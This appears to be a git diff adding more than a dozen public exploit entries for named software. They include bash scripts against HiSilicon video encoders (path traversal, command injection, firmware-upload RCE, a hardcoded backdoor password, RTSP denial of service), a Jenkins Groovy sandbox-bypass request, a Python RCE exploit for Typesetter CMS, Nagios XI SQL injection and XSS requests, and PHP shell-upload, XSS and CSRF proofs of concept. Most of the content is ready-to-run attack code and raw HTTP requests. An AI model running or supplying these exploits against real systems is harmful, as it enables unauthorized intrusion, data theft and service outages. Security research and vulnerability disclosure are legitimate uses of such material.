diff --git a/exploits/hardware/webapps/48899.sh b/exploits/hardware/webapps/48899.sh new file mode 100755 index 000000000..5ebddfacb --- /dev/null +++ b/exploits/hardware/webapps/48899.sh @@ -0,0 +1,24 @@ +#!/usr/bin/env bash + +# Exploit Title: HiSilicon video encoders - unauthenticated file disclosure via path traversal +# Date: 2020-09-20 +# Exploit Author: Alexei Kojenov +# Vendor Homepage: https://www.szuray.com/ +# Software Link: N/A +# Version: up to 1.97 +# Tested on: Linux +# CVE: CVE-2020-24219 +# Vendors: URayTech +# Reference: https://kojenov.com/2020-09-15-hisilicon-encoder-vulnerabilities/ +# Reference: https://www.kb.cert.org/vuls/id/896979 + + +if [ "$#" -ne 2 ] +then + echo "Usage: $0 [:] " + echo "Example: $0 1.2.3.4:8086 /box/box.ini" + exit 1 +fi + +curl -s --path-as-is "http://$1/../../sys/devices/media/13070000.jpgd/../../../..$2" \ + || echo "ERROR: curl returned $?" \ No newline at end of file diff --git a/exploits/hardware/webapps/48900.sh b/exploits/hardware/webapps/48900.sh new file mode 100755 index 000000000..53b70d38c --- /dev/null +++ b/exploits/hardware/webapps/48900.sh @@ -0,0 +1,28 @@ +#!/usr/bin/env bash + +# Exploit Title: HiSilicon video encoders - RCE via unauthenticated command injection +# Date: 2020-09-20 +# Exploit Author: Alexei Kojenov +# Vendor Homepage: multiple vendors +# Software Link: N/A +# Version: vendor-specific +# Tested on: Linux +# CVE: CVE-2020-24217 +# Vendors: URayTech, J-Tech Digital, ProVideoInstruments +# Reference: https://kojenov.com/2020-09-15-hisilicon-encoder-vulnerabilities/ +# Reference: https://www.kb.cert.org/vuls/id/896979 + + +if [ "$#" -ne 2 ] +then + echo "Usage: $0 [:] " + exit 1 +fi + +printf "executing the command... " +if curl -sF "upgrade=;filename=\"logo;$2;.png\"" http://$1 >/dev/null +then + echo "SUCCESS: remote command executed" +else + echo "ERROR: $?" +fi \ No newline at end of file diff --git a/exploits/hardware/webapps/48901.sh b/exploits/hardware/webapps/48901.sh new file mode 100755 index 000000000..f351b131d --- /dev/null +++ b/exploits/hardware/webapps/48901.sh @@ -0,0 +1,35 @@ +#!/usr/bin/env bash + +# Exploit Title: HiSilicon video encoders - RCE via unauthenticated upload of malicious firmware +# Date: 2020-09-20 +# Exploit Author: Alexei Kojenov +# Vendor Homepage: multiple vendors +# Software Link: N/A +# Version: vendor-specific +# Tested on: Linux +# CVE: CVE-2020-24217 +# Vendors: URayTech, J-Tech Digital, ProVideoInstruments +# Reference: https://kojenov.com/2020-09-15-hisilicon-encoder-vulnerabilities/ +# Reference: https://www.kb.cert.org/vuls/id/896979 + + +if [ "$#" -ne 2 ] +then + echo "Usage: $0 [:] " + exit 1 +fi + +printf "creating uk.rar... " +echo "$2" > uk.txt +rar a -ma4 uk.rar uk.txt >/dev/null 2>&1 || { echo "ERROR: rar failed. Is it installed?"; exit 2; } +echo "done" +rm uk.txt + +printf "uploading the RAR file... " +if curl -s -F 'upgrade=@uk.rar' http://$1 >/dev/null +then + echo "SUCCESS: remote command executed" + rm uk.rar +else + echo "ERROR: $?" +fi \ No newline at end of file diff --git a/exploits/hardware/webapps/48902.sh b/exploits/hardware/webapps/48902.sh new file mode 100755 index 000000000..7e018886f --- /dev/null +++ b/exploits/hardware/webapps/48902.sh @@ -0,0 +1,33 @@ +#!/usr/bin/env bash + +# Exploit Title: HiSilicon video encoders - full admin access via backdoor password +# Date: 2020-09-20 +# Exploit Author: Alexei Kojenov +# Vendor Homepage: multiple vendors +# Software Link: N/A +# Version: vendor-specific +# Tested on: Linux +# CVE: CVE-2020-24215 +# Vendors: URayTech, J-Tech Digital, ProVideoInstruments +# Reference: https://kojenov.com/2020-09-15-hisilicon-encoder-vulnerabilities/ +# Reference: https://www.kb.cert.org/vuls/id/896979 + + +if [ "$#" -ne 1 ] +then + echo "Usage: $0 [:]" + exit 1 +fi + +printf "retrieving the password... " +password=$(curl -s --user admin:neworange88888888 http://$1/get_sys | \ + grep -oP '(?<=).*?(?=)') +ret=$? + +if [ "$ret" -eq 0 ] +then + echo "the password is '$password'" + echo "navigate to http://$1 and log into the admin interface with user 'admin' and password '$password'" +else + echo "ERROR: curl returned $ret" +fi \ No newline at end of file diff --git a/exploits/hardware/webapps/48903.sh b/exploits/hardware/webapps/48903.sh new file mode 100755 index 000000000..d62128605 --- /dev/null +++ b/exploits/hardware/webapps/48903.sh @@ -0,0 +1,43 @@ +#!/usr/bin/env bash + +# Exploit Title: HiSilicon video encoders - unauthenticated RTSP buffer overflow (DoS) +# Date: 2020-09-20 +# Exploit Author: Alexei Kojenov +# Vendor Homepage: multiple vendors +# Software Link: N/A +# Version: vendor-specific +# Tested on: Linux +# CVE: CVE-2020-24214 +# Vendors: URayTech, J-Tech Digital, ProVideoInstruments +# Reference: https://kojenov.com/2020-09-15-hisilicon-encoder-vulnerabilities/ +# Reference: https://www.kb.cert.org/vuls/id/896979 + + +if [ "$#" -ne 2 ] +then + echo "usage: $0 " + exit 1 +fi + +server=$1 +port=$2 + +printf "checking the target... " +timeout 2 curl -s rtsp://$server:$port \ + || { echo "ERROR: no RTSP server found at $server:$port"; exit 2; } +printf "RTSP server detected\n" + +cseq=$(printf "0%0.s" {1..3000}) + +printf "sending the payload... " +printf "OPTIONS /0 RTSP/1.0\nCSeq: %s\n\n" $cseq | telnet $server $port >/dev/null 2>&1 +printf "done\n" + +sleep 1 +printf "checking the target again... " +if timeout 2 curl -s rtsp://$server:$port +then + echo "ERROR: the RTSP server still seems to be running :(" +else + echo "SUCCESS: the server is down" +fi \ No newline at end of file diff --git a/exploits/java/webapps/48904.txt b/exploits/java/webapps/48904.txt new file mode 100644 index 000000000..ef23e1a40 --- /dev/null +++ b/exploits/java/webapps/48904.txt @@ -0,0 +1,33 @@ +# Exploit Title: Jenkins 2.63 - Sandbox bypass in pipeline: Groovy plug-in +# Date: 8th October 2020 +# Exploit Author: dmw0ng +# Vendor Homepage: https://www.jenkins.io +# Software Link: http://archives.jenkins-ci.org/windows/jenkins-2.63.zip +# Version: Jenkins 2.63 +# Tested on: Ubuntu 18.04 / 20.04 +# CVE : CVE-2019-1003030 + +GET /jenkinselj/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.scriptsecurity.sandbox.groovy.SecureGroovyScript/checkScript?sandbox=true&value=public class x { + public x(){ +"ping -c 1 xx.xx.xx.xx".execute() +} +} HTTP/1.1 +Host: 127.0.0.1 +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Cookie: JSESSIONID.4495c8e0=node01jguwrtw481dx1bf3gaoq5o6no32.node0 +Connection: close +Upgrade-Insecure-Requests: 1 + +URL Encoding the following for RCE +```public class x { + public x(){ +"ping -c 1 xx.xx.xx.xx".execute() +} +} ``` + +to + +%70%75%62%6c%69%63%20%63%6c%61%73%73%20%78%20%7b%0a%20%20%70%75%62%6c%69%63%20%78%28%29%7b%0a%22%70%69%6e%67%20%2d%63%20%31%20%78%78%2e%78%78%2e%78%78%2e%78%78%22%2e%65%78%65%63%75%74%65%28%29%0a%7d%0a%7d \ No newline at end of file diff --git a/exploits/php/webapps/48892.txt b/exploits/php/webapps/48892.txt new file mode 100644 index 000000000..c5ddafb0d --- /dev/null +++ b/exploits/php/webapps/48892.txt @@ -0,0 +1,67 @@ +#Exploit Title: Tourism Management System 1.0 - Arbitrary File Upload +#Date: 2020-10-19 +#Exploit Author: Ankita Pal & Saurav Shukla +#Vendor Homepage: https://phpgurukul.com/tourism-management-system-free-download/ +#Software Link: https://phpgurukul.com/?smd_process_download=1&download_id=7204 +#Version: V1.0 +#Tested on: Windows 10 + xampp v3.2.4 + + +Proof of Concept::: + +Step 1: Open the affected URL http://localhost:8081/Tourism%20Management%20System%20-TMS/tms/admin/create-package.php + +Step 2: Open Tour Package -> Create + +Malicious Request::: + +POST /Tourism%20Management%20System%20-TMS/tms/admin/create-package.php HTTP/1.1 +Host: localhost:8081 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 +Accept-Language: en-GB,en;q=0.5 +Accept-Encoding: gzip, deflate +Content-Type: multipart/form-data; boundary=---------------------------63824304340061635682865592713 +Content-Length: 1101 +Origin: http://localhost:8081 +Connection: close +Referer: http://localhost:8081/Tourism%20Management%20System%20-TMS/tms/admin/create-package.php +Cookie: PHPSESSID=q9kusr41d3em013kbe98b701id +Upgrade-Insecure-Requests: 1 + +-----------------------------63824304340061635682865592713 +Content-Disposition: form-data; name="packagename" + +Pack1 +-----------------------------63824304340061635682865592713 +Content-Disposition: form-data; name="packagetype" + +Family +-----------------------------63824304340061635682865592713 +Content-Disposition: form-data; name="packagelocation" + +Manali +-----------------------------63824304340061635682865592713 +Content-Disposition: form-data; name="packageprice" + +21 +-----------------------------63824304340061635682865592713 +Content-Disposition: form-data; name="packagefeatures" + +Free +-----------------------------63824304340061635682865592713 +Content-Disposition: form-data; name="packagedetails" + +Details +-----------------------------63824304340061635682865592713 +Content-Disposition: form-data; name="packageimage"; filename="file1.php" +Content-Type: application/octet-stream + + +-----------------------------63824304340061635682865592713 +Content-Disposition: form-data; name="submit" + + +-----------------------------63824304340061635682865592713-- \ No newline at end of file diff --git a/exploits/php/webapps/48893.txt b/exploits/php/webapps/48893.txt new file mode 100644 index 000000000..0a0af943e --- /dev/null +++ b/exploits/php/webapps/48893.txt @@ -0,0 +1,34 @@ +# Exploit Title: Nagios XI 5.7.3 - 'Contact Templates' Persistent Cross-Site Scripting +# Date: 10-18-2020 +# Exploit Author: Matthew Aberegg +# Vendor Homepage: https://www.nagios.com/products/nagios-xi/ +# Vendor Changelog: https://www.nagios.com/downloads/nagios-xi/change-log/ +# Software Link: https://www.nagios.com/downloads/nagios-xi/ +# Version: Nagios XI 5.7.3 +# Tested on: Ubuntu 18.04 + + +# Vulnerability Details +# Description : A persistent cross-site scripting vulnerability exists in the "Contact Templates" functionality of the Core Config Manager of Nagios XI. +# Vulnerable Parameter : tfName + + +# POC +# Exploit Details : The following request will create a contact template with an XSS payload as the contact template name. Click on "Relationships" for the malicious template to trigger the payload. + + +POST /nagiosxi/includes/components/ccm/index.php?type=contacttemplate&page=1 HTTP/1.1 +Host: TARGET +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:82.0) Gecko/20100101 Firefox/82.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Content-Type: application/x-www-form-urlencoded +Content-Length: 642 +Origin: http://TARGET +Connection: close +Referer: http://TARGET/nagiosxi/includes/components/ccm/index.php?cmd=modify&type=contacttemplate&id=7&page=1&returnUrl=index.php%3Fcmd%3Dview%26type%3Dcontacttemplate%26page%3D1 +Cookie: nagiosxi=a354rem56a8aoeieqr9k2le39i +Upgrade-Insecure-Requests: 1 + +tfName=&tfFriendly=&tfEmail=&tfPager=&Active=1&tfAddress1=&tfAddress2=&tfAddress3=&tfAddress4=&tfAddress5=&tfAddress6=&radHostNotifEnabled=2&selHostPeriod=0&radStatusInfos=2&radNoStatusInfos=2&radServiceNotifEnabled=2&selServicePeriod=0&radCanSubCmds=2&radContactgroup=2&radServicecommand=2&radHostcommand=2&txtVariablename=&txtVariablevalue=&cmd=submit&mode=modify&hidId=7&hidName=test&hidServiceDescription=&hostAddress=127.0.0.1&exactType=contacttemplate&type=contacttemplate&genericType=contacttemplate&returnUrl=index.php%3Fcmd%3Dview%26type%3Dcontacttemplate%26page%3D1&token=3b8273eea1213ac4d2c1f3da1b0c370d \ No newline at end of file diff --git a/exploits/php/webapps/48894.txt b/exploits/php/webapps/48894.txt new file mode 100644 index 000000000..41b55bbf2 --- /dev/null +++ b/exploits/php/webapps/48894.txt @@ -0,0 +1,30 @@ +# Exploit Title: Nagios XI 5.7.3 - 'Manage Users' Authenticated SQL Injection +# Date: 10-18-2020 +# Exploit Author: Matthew Aberegg +# Vendor Homepage: https://www.nagios.com/products/nagios-xi/ +# Vendor Changelog: https://www.nagios.com/downloads/nagios-xi/change-log/ +# Software Link: https://www.nagios.com/downloads/nagios-xi/ +# Version: Nagios XI 5.7.3 +# Tested on: Ubuntu 18.04 + + +# Vulnerability Details +# Description : A blind SQL injection vulnerability exists in the "Manage Users" functionality of the Core Config Manager of Nagios XI. +# Vulnerable Parameter : id + + +# POC + +POST /nagiosxi/includes/components/ccm/index.php?type=user&page=1 HTTP/1.1 +Host: TARGET +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:82.0) Gecko/20100101 Firefox/82.0 +Accept: */* +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Connection: close +Referer: http://TARGET/nagiosxi/includes/components/ccm/index.php?cmd=modify&type=user&id=2&page=1&returnUrl=index.php%3Fcmd%3Dadmin%26type%3Duser%26page%3D1 +Cookie: nagiosxi=a354rem56a8aoeieqr9k2le39i +Content-Type: application/x-www-form-urlencoded +Content-Length: 338 + +username=test&alias=test&password=password&confirm=password&active=1&id=2+AND+(SELECT+1+FROM+(SELECT(SLEEP(5)))A)&cmd=admin&mode=modify&hidId=2&hidName=&hidServiceDescription=&hostAddress=127.0.0.1&exactType=user&type=user&genericType=user&returnUrl=index.php%3Fcmd%3Dadmin%26type%3Duser%26page%3D1&token=991611d98c6c8ea7d32c54522b346448 \ No newline at end of file diff --git a/exploits/php/webapps/48895.txt b/exploits/php/webapps/48895.txt new file mode 100644 index 000000000..6d89637d3 --- /dev/null +++ b/exploits/php/webapps/48895.txt @@ -0,0 +1,27 @@ +# Exploit Title: Nagios XI 5.7.3 - 'SNMP Trap Interface' Authenticated SQL Injection +# Date: 10-18-2020 +# Exploit Author: Matthew Aberegg +# Vendor Homepage: https://www.nagios.com/products/nagios-xi/ +# Vendor Changelog: https://www.nagios.com/downloads/nagios-xi/change-log/ +# Software Link: https://www.nagios.com/downloads/nagios-xi/ +# Version: Nagios XI 5.7.3 +# Tested on: Ubuntu 18.04 + + +# Vulnerability Details +# Description : A blind SQL injection vulnerability exists in the "Add a Trap Definition" functionality of the SNMP Trap Interface of Nagios XI. +# Vulnerable Parameter : id + + +# POC + +GET /nagiosxi/includes/components/nxti/index.php?event=test&oid=123&category=test&severity=test&desc=%3C%3E&format=&id=&SNMPTW%5Bhost%5D=&SNMPTW%5Bservice%5D=&SNMPTW%5Bseverity%5D=%24s&SNMPTW%5Boutput%5D=&exec%5B%5D=&raw-data=&mode=save&new=0&tab=3&id=1+AND+(SELECT+1+FROM+(SELECT(SLEEP(5)))a) HTTP/1.1 +Host: TARGET +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:82.0) Gecko/20100101 Firefox/82.0 +Accept: */* +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +X-Requested-With: XMLHttpRequest +Connection: close +Referer: http://TARGET/nagiosxi/includes/components/nxti/index.php +Cookie: nagiosxi=a354rem56a8aoeieqr9k2le39i \ No newline at end of file diff --git a/exploits/php/webapps/48896.txt b/exploits/php/webapps/48896.txt new file mode 100644 index 000000000..1324771f9 --- /dev/null +++ b/exploits/php/webapps/48896.txt @@ -0,0 +1,17 @@ +# Exploit Title: Online Student's Management System 1.0 - Remote Code Execution (Authenticated) +# Google Dork: N/A +# Date: 2020/10/18 +# Exploit Author: Akıner Kısa +# Vendor Homepage: https://www.sourcecodester.com/php/14490/online-students-management-system-php-full-source-code-2020.html +# Software Link: https://www.sourcecodester.com/sites/default/files/download/janobe/studentrecord_0.zip +# Version: 1.0 +# Tested on: XAMPP +# CVE : N/A + +Proof of Concept: + +1 - Go to http://localhost/studentrecord/ url, click "click here to sign in" text and login with the 070101:070101 information. + +2 - Then go to http: //localhost/studentrecord/my-profile.php and upload your shell file from the upload new photo section and click the update button. + +3 - Finally, open your shell in http://localhost/studentrecord/staffphoto/shell.php \ No newline at end of file diff --git a/exploits/php/webapps/48897.txt b/exploits/php/webapps/48897.txt new file mode 100644 index 000000000..f2ff2f4d5 --- /dev/null +++ b/exploits/php/webapps/48897.txt @@ -0,0 +1,17 @@ +# Exploit Title: Online Discussion Forum Site 1.0 - XSS in Messaging System +# Google Dork: N/A +# Date: 2020-10-17 +# Exploit Author: j5oh +# Vendor Homepage: https://www.sourcecodester.com/php/14233/online-discussion-forum-site.html +# Software Link: https://www.sourcecodester.com/download-code?nid=14233&title=Online+Discussion+Forum+Site +# Version: 1.0 (REQUIRED) +# Tested on: Windows 10 / Wamp Server +# CVE : N/A + +The messaging subsystem in the Online Discussion Forum is vulnerable to XSS in the message body. This will execute when viewing the messages page: http://localhost/Online%20Discussion%20Forum%20Site/messages.php. + +XSS can be done through the messaging interface, go to http://localhos/Online%20Discussion%20Forum%20Site/messages.php, select 'Send New Message', search for the user to send the message to, click the 'Send Message' button next to the user, and add the javascript in the message body. Alternatively, if you know the user id you can just send the message directly thought the tt parameter of http://localhost/Online%20Discussion%20Forum%20Site/messageH.php. + +# PoC: + +curl -d 'uto=1&tt=' -b "PHPSESSID=798bkt3dkvoczjp7arnco3jf0c" http://localhost/Online%20Discussion%20Forum%20Site/messageH.php \ No newline at end of file diff --git a/exploits/php/webapps/48898.txt b/exploits/php/webapps/48898.txt new file mode 100644 index 000000000..8450bab5a --- /dev/null +++ b/exploits/php/webapps/48898.txt @@ -0,0 +1,17 @@ +# Exploit Title: Online Job Portal 1.0 Cross Site Scripting (Stored) +# Google Dork: N/A +# Date: 2020/10/17 +# Exploit Author: Akıner Kısa +# Vendor Homepage: https://www.sourcecodester.com/php/13850/online-job-portal-phppdo.html +# Software Link: https://www.sourcecodester.com/sites/default/files/download/janobe/jobportal.zip +# Version: 1.0 +# Tested on: XAMPP +# CVE : N/A + +Proof of Concept: + +1 - Open URL http://localhost/jobportal/Employer/ManageJob.php + +2 - Fill in the blanks with this payload: "> + +3 - And click submit button. \ No newline at end of file diff --git a/exploits/php/webapps/48905.txt b/exploits/php/webapps/48905.txt new file mode 100644 index 000000000..f4ec47ad7 --- /dev/null +++ b/exploits/php/webapps/48905.txt @@ -0,0 +1,39 @@ +# Exploit Title: PHPGurukul hostel-management-system 2.1 allows XSS via +Guardian Name, Guardian Relation, Guardian Contact no, Address, City +# Google Dork: N/A +# Date: 2020-10-08 +# Exploit Author: Kokn3t +# Vendor Homepage: https://phpgurukul.com +# Software Link: https://phpgurukul.com/hostel-management-system +# Version: V 2.1 +# Tested on: Windows 10, Kali 2020.1 +# CVE : CVE-2020-25270 + +######## Attack Vector ######## + +Install Hostel Management System V 2.1 + +1) User Module + + Login as user and go to "Book Hostel" +(http:/localhost/hostel/book-hostel.php) and start booking. + + Add malicious script in these fields - "" + + i. Guardian Name + + ii. Guardian Relation + + iii.Guardian Contact no + + iv. Address + + vi. City + + After that will get a prompt "Student Successfully register" and after +pressing "See All", XSS will be triggered. + +2) Admin Module + +Login in as Admin and go to "Management Students", and "View Full details" +of booked student's record, XSS will be triggered also. \ No newline at end of file diff --git a/exploits/php/webapps/48906.py b/exploits/php/webapps/48906.py new file mode 100755 index 000000000..19c5d4b95 --- /dev/null +++ b/exploits/php/webapps/48906.py @@ -0,0 +1,211 @@ +# Exploit Title: Typesetter CMS 5.1 - Arbitrary Code Execution +# Exploit Author: Rodolfo "t0gu" Tavares +# Contact: @t0guu (TW) +# Software Homepage: https://www.typesettercms.com/ +# Version : 5.1 +# Tested on: Linux / Apache +# Category: WebApp +# Google Dork: intext:"Powered by Typesetter" +# Date: 2020-09-29 +# CVE : CVE-2020-25790 + +######## Description ######## +# +# The CMS Typesetter has functionality (web interface) where it is possible +# through an account with privileges to perform uploads. Through this +# functionality, it is possible to upload a .zip file that contains a +# malicious .php file. In the same functionality, there is also the +# possibility to extract the file through the same web interface, the +# attacker only needs to extract the .zip that was previously loaded and +# click on the malicious .php file to execute commands in the operating +# system. +# + +######## Exploit with Poc ######## + + +https://github.com/t0gu/CVE-2020-25790 + +####### Code ####### + + +# see the poc at https://github.com/t0gu/CVE-2020-25790 + +import argparse +from bs4 import BeautifulSoup +import requests +import sys +import re + + +import urllib3 +from urllib3.exceptions import InsecureRequestWarning + +banner = """ + + + ██████╗██╗ ██╗███████╗ ██████╗ ██████╗ ██████╗ ██████╗ ██████╗ ███████╗███████╗ █████╗ ██████╗ +██╔════╝██║ ██║██╔════╝ ╚════██╗██╔═████╗╚════██╗██╔═████╗ ╚════██╗██╔════╝╚════██║██╔══██╗██╔═████╗ +██║ ██║ ██║█████╗█████╗ █████╔╝██║██╔██║ █████╔╝██║██╔██║█████╗ █████╔╝███████╗ ██╔╝╚██████║██║██╔██║ +██║ ╚██╗ ██╔╝██╔══╝╚════╝██╔═══╝ ████╔╝██║██╔═══╝ ████╔╝██║╚════╝██╔═══╝ ╚════██║ ██╔╝ ╚═══██║████╔╝██║ +╚██████╗ ╚████╔╝ ███████╗ ███████╗╚██████╔╝███████╗╚██████╔╝ ███████╗███████║ ██║ █████╔╝╚██████╔╝ + ╚═════╝ ╚═══╝ ╚══════╝ ╚══════╝ ╚═════╝ ╚══════╝ ╚═════╝ ╚══════╝╚══════╝ ╚═╝ ╚════╝ ╚═════╝ + +by: t0gu + + +usage: main.py [-h] -p PASSWORD -l LOGIN -u URL + +==> Exploit for CVE 2020-25790 + +optional arguments: + -h, --help show this help message and exit + -p PASSWORD, --password PASSWORD + ==> admin password + -l LOGIN, --login LOGIN + ==> admin login + -u URL, --url URL ==> main URL + + """ + +print(banner) +menu = argparse.ArgumentParser(description="==> Exploit for CVE 2020-25790") +menu.add_argument("-p", "--password", required=True, help="==> admin password") +menu.add_argument("-l", "--login", required=True, help="==> admin login") +menu.add_argument("-u", "--url", required=True, help="==> main URL") +menu.add_argument("-f", "--file", required=True, help="==> Malicous zip file with php file inside") +args = menu.parse_args() + +login = args.login +password = args.password +url = args.url +file = args.file + + +PROXIES = proxies = { + "http": "http://127.0.0.1:8080", + "https": "https://127.0.0.1:8080", +} + + +class Exploit: + + def __init__(self, login, password, url, file): + self.login = login + self.password = password + self.url = url + self.user_agent = "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari" + self.file = open(file, 'rb') + + def get_nounce(self): + try: + url = self.url + "/Admin" + r = requests.get(url=url, headers={'User-Agent': self.user_agent}, timeout=3, verify=False) + data = r.text + soap_obj = BeautifulSoup(data, 'html.parser') + for inp in soap_obj.find_all("input"): + for v in inp: + nounce = v['value'] + if nounce != None or nounce != "": + return nounce + except (requests.exceptions.BaseHTTPError, requests.exceptions.Timeout) as e: + print(f'==> Error {e}') + + def get_hash_folders(self): + + cookie_auth = self.get_cookies() + hash_verified = self.get_verified() + data_post = {'verified': hash_verified, 'cmd': 'open', 'target':'', 'init': 1, 'tree': 1} + try: + url = self.url + "/Admin_Finder" + r = requests.post(url=url, data=data_post, headers={'User-Agent': self.user_agent, 'Cookie': cookie_auth}, timeout=10, verify=False) + json_data = r.json() + hash_dir = json_data['files'][2]['hash'] + return hash_dir + except (requests.exceptions.BaseHTTPError, requests.exceptions.Timeout) as e: + print(f'==> Error {e}') + + def get_cookies(self): + + nounce = self.get_nounce() + if nounce: + try: + url = self.url + "/Admin" + data_post = {'file': '', 'cmd': 'login', 'login_nonce': nounce, 'username': self.login, 'user_sha': '', + 'password': self.password, 'pass_md5': '', 'pass_sha': '', 'pass_sha512': '', + 'remember': 'on', 'verified': ''} + r = requests.post(url=url, verify=False, timeout=3, data=data_post, allow_redirects=False, + headers={'User-Agent': self.user_agent, 'Cookie': 'g=2'}) + cookie_admin = r.headers['Set-Cookie'] + cookie_name = cookie_admin.split(':')[0].split('=')[0] + cookie_value = cookie_admin.split(':')[0].split('=')[1].split(';')[0] + + if cookie_name == None or cookie_name == "": + if cookie_value == None or cookie_value == "": + print("==> Something went wrong while login") + else: + data = f"{cookie_name}={cookie_value};" + return data + except (requests.exceptions.Timeout, requests.exceptions.BaseHTTPError) as e: + print(f'==> Error while login {e}') + + def upload_zip(self): + url = self.url + '/Admin_Finder' + hash_verified = self.get_verified() + hash_dir = self.get_hash_folders() + auth_cookie = self.get_cookies() + + try: + print(f"==> Uploading file: {self.file}") + data = {'cmd': "upload", "target": hash_dir, "verified": hash_verified} + r = requests.post(url=url, verify=False, timeout=10, + headers={'User-Agent': self.user_agent, 'Cookie': auth_cookie}, data=data, files={'upload[]': self.file}) + hash_file = r.json()['added'][0]['hash'] + self.extract_file(auth_cookie, hash_file, hash_verified) + except (requests.exceptions.HTTPError, requests.exceptions.Timeout) as e: + print(f"==> Error while uploading {e}") + + + def extract_file(self, auth_cookie, hash_file, hash_verified): + data_post={'verified': hash_verified, 'cmd': 'extract', 'target': hash_file} + try: + url = self.url + "/Admin_Finder" + r = requests.post(url=url, data=data_post, headers={'User-Agent': self.user_agent, 'Cookie': auth_cookie}, timeout=10, verify=False) + name_file = r.json()['added'][0]['name'] + print(f"==> All Hashes are collected from: {name_file}") + self.xpl(auth_cookie,name_file) + except (requests.exceptions.BaseHTTPError, requests.exceptions.Timeout) as e: + print(f'==> Error {e}') + + + def xpl(self, auth_cookie, name_file): + try: + url = self.url + "/data/_uploaded/file/" + name_file + "?cmd=id" + new_url = url.replace("index.php", "") + print(f"==> Try to exploit: {new_url}") + r = requests.get(url=new_url, headers={'User-Agent': self.user_agent, 'Cookie': auth_cookie}, timeout=10, verify=False) + pattern = r'
(.*?)
' + m = re.search(pattern, r.text.replace("\n", "")) + if m is not None and m != "": + print(f"==> Vulnerable: {m.group(1)}") + except (requests.exceptions.BaseHTTPError, requests.exceptions.Timeout) as e: + print(f'==> Error {e}') + + + def get_verified(self): + try: + url = self.url + "/Admin/Uploaded" + auth_cookie = self.get_cookies() + r = requests.get(url=url, headers={'User-Agent': self.user_agent, 'Cookie': auth_cookie}, timeout=10, verify=False) + data = r.text + pattern_regex = r'"verified":"(.*)"}' + m = re.search(pattern_regex, data) + if m is not None or m != "": + return m.group(1) + + except (requests.exceptions.BaseHTTPError, requests.exceptions.Timeout) as e: + print(f'==> Error {e}') + +if __name__ == "__main__": + obj = Exploit(login, password, url, file) + obj.upload_zip() \ No newline at end of file diff --git a/exploits/php/webapps/48907.txt b/exploits/php/webapps/48907.txt new file mode 100644 index 000000000..5bf6d2454 --- /dev/null +++ b/exploits/php/webapps/48907.txt @@ -0,0 +1,137 @@ +# Exploit Title: Textpattern CMS 4.6.2 - Cross-site Request Forgery +# Exploit Author: Alperen Ergel +# Contact: @alpren_ae +# Software Homepage: https://textpattern.com/ +# Version : 4.6.2 +# Tested on: windows 10 / xammp +# Category: WebApp +# Google Dork: intext:"Published with Textpattern CMS" +# Date: 2020-10-29 +######## Description ######## +# +# 1-) Loggin administrator page +# +# 2-) Go admin > prefs > site +# +# 3-) All inputs vulnerable to CSRF +# +# +######## Proof of Concept ######## + +========>>> REQUEST <<<========= + +POST /textpattern/textpattern/index.php?event=prefs HTTP/1.1 +Host: localhost +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Referer: http://localhost/textpattern/textpattern/index.php +Content-Type: application/x-www-form-urlencoded +Content-Length: 1806 +Connection: close +Cookie: txp_login=localhost%2Ca170e235c4f2f59bb1300272c470807d; txp_login_public=a834cbdc8blocalhost; __atuvc=1%7C40 +Upgrade-Insecure-Requests: 1 + +Submit=Save&sitename=victim+site&siteurl=victimurl.com&site_slogan=victimslogan&production_status=testing&timezone_key=Europe%2FBerlin&auto_dst=0& +is_dst=0&dateformat=since&archive_dateformat=%25b+%25Oe%2C+%25I%3A%25M+%25p&permlink_mode=section_id_title&doctype=html5&logging=none&expire_logs_after=7& +use_comments=1&img_dir=images&skin_dir=themes&file_base_path=%2Fvar%2Fwww%2Fvhosts%2Flocalhost%2Fhttpdocs%2Ftextpattern%2Ffiles& +file_max_upload_size=2000000&tempdir=%2Fvar%2Fwww%2Fvhosts%2Flocalhost%2Fhttpdocs%2Ftextpattern%2Ftextpattern%2Ftmp&plugin_cache_dir=& +smtp_from=&publisher_email=&override_emailcharset=0&enable_xmlrpc_server=0&default_event=article&theme_name=hive&module_pophelp=1&default_publish_status=4& +title_no_widow=0&articles_use_excerpts=1&allow_form_override=1&attach_titles_to_permalinks=1&permlink_format=1&send_lastmod=1&publish_expired_articles=0&use_textile=1&enable_short_tags=1& +use_plugins=1&admin_side_plugins=1&allow_page_php_scripting=1&allow_article_php_scripting=1&max_url_len=1000&syndicate_body_or_excerpt=1&rss_how_many=5&show_comment_count_in_feed=1& +include_email_atom=0&use_mail_on_feeds_id=0&comments_on_default=0&comments_default_invite=Comment&comments_moderate=1&comments_disabled_after=42&comments_auto_append=0& +comments_mode=0&comments_dateformat=%25b+%25Oe%2C+%25I%3A%25M+%25p&comments_sendmail=0&comments_are_ol=1&comment_means_site_updated=1& +comments_require_name=1&comments_require_email=1&never_display_email=1&comment_nofollow=1&comments_disallow_images=0&comments_use_fat_textile=0&spam_blacklists=& +custom_1_set=custom1&custom_2_set=custom2&custom_3_set=&custom_4_set=&custom_5_set=&custom_6_set=&custom_7_set=&custom_8_set=&custom_9_set=&custom_10_set=& +step=prefs_save&event=prefs&_txp_token=0342db47efb6882b488f6d367067d720 + + +### EXPLOIT #### + + + + +
